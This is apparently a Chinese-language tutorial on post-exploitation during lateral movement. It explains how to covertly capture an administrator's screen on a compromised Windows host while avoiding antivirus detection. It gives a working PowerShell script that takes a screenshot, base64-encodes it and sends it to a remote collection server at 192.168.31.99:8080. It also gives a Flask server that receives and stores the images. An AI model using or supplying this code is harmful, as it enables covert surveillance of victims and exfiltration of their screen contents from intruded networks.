在横向移动时，截图看管理在做什么，是信息收集工作一种，如果下载其他截屏软件，可能需要过杀毒软件，有没有自带或者脚本，直接截图，还能上传到服务器呢

PowerShell

PowerShell 是一种跨平台的任务自动化解决方案，由命令行 shell、脚本语言和配置管理框架组成。PowerShell 在 Windows、Linux 和 macOS 上运行。

作为一种脚本语言，PowerShell 通常用于自动执行系统管理。它还用于经常在 CI/CD 环境中生成、测试和部署解决方案。PowerShell 是在 .NET 公共语言运行时 (CLR) 上构建的。所有输入和输出都是 .NET 对象。无需分析文本输出即可从输出中提取信息。PowerShell 脚本语言包含以下功能：

可通过函数、类、脚本和模块进行扩展
便于输出的可扩展格式系统
用于创建动态类型的可扩展类型系统
对常用数据格式（例如 CSV、JSON 和 XML）的内置支持

powershell脚本非常强大，我们用它来编写截屏脚本(screenshot.ps1)，代码如下：

# 加载必要的程序集Add-Type -AssemblyName System.Windows.FormsAdd-Type -AssemblyName System.Drawing# 截取屏幕快照[System.Windows.Forms.SendKeys]::SendWait("{PrtSc}")Start-Sleep -Milliseconds 400# 从剪贴板获取屏幕快照$image = [System.Windows.Forms.Clipboard]::GetImage()# 检查是否成功获取图像if ($image -ne $null) {    # 将图像转换为字节数组并进行Base64编码    $imageBytes = [System.IO.MemoryStream]::new()    $image.Save($imageBytes, [System.Drawing.Imaging.ImageFormat]::Png)    $base64Image = [Convert]::ToBase64String($imageBytes.ToArray())    # 发送图像到服务器    $uri = "http://192.168.31.99:8080/upload"    $body = @{        image = $base64Image    }    Invoke-WebRequest -Uri $uri -Method POST -ContentType "application/json" -Body ($body | ConvertTo-Json)    # 释放图像资源    $image.Dispose()} else {    Write-Host "Failed to retrieve screenshot from clipboard."}

客户端代码写好，再写个服务端代码进行接收程序screenshot_server.py代码如下：

from flask import Flask, request, jsonifyimport base64import timeapp = Flask(__name__)@app.route('/upload', methods=['POST'])def upload_image():    try:        # 获取 POST 请求中的 JSON 数据        data = request.get_json()        if 'image' in data:            # 将 Base64 编码的图像数据解码为字节数组            image_data = base64.b64decode(data['image'])            # 指定保存图像的文件路径和文件名            timestamp = int(time.time())            local_file_path = f"screenshot_{timestamp}.png"            # 将图像数据保存到本地文件            with open(local_file_path, 'wb') as image_file:                image_file.write(image_data)            return jsonify({'message': 'Image uploaded successfully.'}), 200        else:            return jsonify({'error': 'Image data not found in request.'}), 400    except Exception as e:        return jsonify({'error': str(e)}), 500if __name__ == '__main__':    app.run(host='0.0.0.0', port=8080)